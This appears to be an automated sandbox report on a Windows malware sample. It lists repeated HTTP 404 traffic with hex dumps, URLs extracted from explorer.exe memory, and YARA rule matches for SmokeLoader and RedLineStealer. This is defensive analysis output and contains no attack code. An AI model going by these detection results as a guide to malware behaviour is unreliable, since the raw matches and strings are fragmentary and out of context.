Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:29:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:29:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:29:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:30:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:30:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:30:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:31:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1797350947.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1791836520.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1792703988.0000000008720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1799460114.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1789210976.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1795949633.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1795949633.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1799460114.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817

Source: unknown

HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49817 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
